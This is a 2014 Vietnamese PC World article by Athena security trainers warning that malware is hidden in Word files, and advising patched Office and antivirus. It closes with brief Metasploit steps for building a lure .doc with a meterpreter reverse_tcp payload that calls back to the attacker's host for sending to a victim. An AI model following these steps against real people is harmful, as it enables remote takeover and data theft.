• Thứ Năm, 03/04/2014 08:57 (GMT+7)

    Xâm nhập máy tính qua file Word

    Võ Đỗ Thắng - Trần Lâm Mẫn
    Những thủ đoạn mà tin tặc sử dụng để xâm nhập máy tính người dùng với mục đích ăn cắp thông tin, dữ liệu. Cách thức phòng chống và ngăn chặn

    Backtrack là công cụ có nhiều tính năng cho phép tạo virus tự động , được sử dụng phổ biến hiện nay trong cộng đồng an ninh mạng

    Hiện nay, các tập tin văn bản Word  (.doc hoặc .docx)  được đa số người dùng máy tính sử dụng trong công việc và học tập. Chính vì định dạng văn bản này được dùng rất phổ biến nên nó đã trở thành phương tiện cho hackers sử dụng đễ phát tán virus hay trojan. Phổ biến nhất và  chương trình  Microsoft Office 2003 và 2007.
    Các hacker sử dụng các công cụ như Backtrack, Kali-linux… để tạo và nhúng các loại chương trình, mã độc Malware, Virus, Backdoor vào các file “.doc” hoặc “.docx”. Thời gian để tạo những file có chứa mã độc này chỉ mất 5-10 phút .
    Với công nghệ cụ tạo virus tự động như Backtrack, thì một người không chuyên về bảo mật mạng vẫn có thể dễ dàng tạo được những virus, Trojan, …. Và phát tán chúng qua mạng xã hội một cách nhanh chóng.

    Hackers phát tán qua email, diễn đàn hay qua mạng xã hội các tập tin “.doc” hay “.docx”.

    Nạn nhân giờ đây bị hackers kiểm soát và dùng để thực hiện các cuộc tấn công DDOS hoặc đánh cấp dữ liệu ,thông tin tài khoản của nạn nhân.

    Máy tính được cài các chương trình bảo vệ có bản quyền với đầy đủ các tính năng Internet Sercurity sẽ trở nên an toàn hơn.

    Đối với người sử dụng , theo khảo sát riêng của trung tâm ATHENA, 90% người thiếu kiến thức về an ninh mạng, không có khả năng nhận biết được các nguy cơ an ninh mạng khi truy lướt web, truy cập Internet, và  thường cho rằng virus hay mã độc chỉ ở tập tin dạng “.exe”  nên thường không lưu tâm đến tập tin dạng“.doc” hay “.docx”. Nhưng thực tế các tập tin này lại tiềm tàng chứa đựng những rủi ro rất lớn.
    Với số lượng người sử dụng mạng xã hội hàng chục triệu như hiện nay, thì đây là một môi trường rất hiệu quả để phát tán các chương trình mã độc. Nhiều nạn nhân bị mất dữ liệu mà hoàn toàn không biết được mình đã bị mất và mất như thế nào. Theo ghi nhận của ATHENA, đã có trường hợp doanh nghiệp bị xâm nhập và lấy đi những dữ liệu quan trọng, thiệt hại kinh tế lên đến hàng trăm ngàn đô la Mỹ.
    Để phòng chống các  trường hợp này chúng ta phải cảnh giác và áp dụng các biện pháp như luôn sử dụng các bản Office có bản quyền để luôn được  cập nhật vá lỗi và hỗ trợ kỹ thuật từ nhà cung cấp. Không nên mở các  file Word từ email không rõ nguồn gốc, luôn sử dụng chương trình diệt virus trên máy tính, thường xuyên cập nhật mới nhất  chương trình đó, cập nhật bản vá lỗi mới nhất của MS Office 2003 và MS Office 2007…
    Đồng thời, khi  sử dụng  các chương trình diệt virus của các hãng  bảo mật, chúng ta phải sử dụng phiên bản  có  chữ  “Internet” ví dụ như “Kaspersky Internet Security” ”Symantec Internet Security” ,“AVG Internet Security 2014”.” BKAV Internet Security”… Các bản được gán chữ  “internet” sẽ có chức năng cao cấp hơn, giúp chúng ta chống được việc  điều khiển từ xa của hacker mặc dù máy chúng  ta dính phải  lỗ hổng bảo mật, hay quét các lỗ hổng bảo mật mà trên máy chúng ta mắc phải.
     

    Các bước tạo và nhúng mã độc

    Đây là tóm tắt một số bước để tiến hành tạo mã độc và nhúng mã độc vào file “.doc” mà hacker thường sử dụng với chương trình sử dụng Backtrack

    Bước 1: Khởi động Backtrack.

    Bước 2: Dùng lệnh show options để xem những thông tin cần thiết.

    Bước 3: Chỉnh tên file cho hấp dẫn bằng lệnh set FILENAME (ví dụ : baocao.doc)
    Set payload windows/meterpreter/reverse_tcp

    Bước 4: Thiết lập LHOST (Local Host) và LPORT (Local Port)

    Bằng lệnh set LHOST [ip] (lấy ip của máy bằng câu lệnh ifconfig)
    Và Set Lport 4443 (port này không được đụng tới những port của hệ thống)
    Cuối cùng ta exploit để tạo file virus gửi cho victim (nạn nhân)

    Về tác giả: Võ Đỗ Thắng – Trần Lâm Mẫn là các chuyên gia an ninh – bảo mật của Athena, Trung tâm Đào tạo Quản trị mạng và An ninh mạng quốc tế

     

     

    PC World VN, 03/2014

    Từ khóa: mã độc
    ID: A1403_56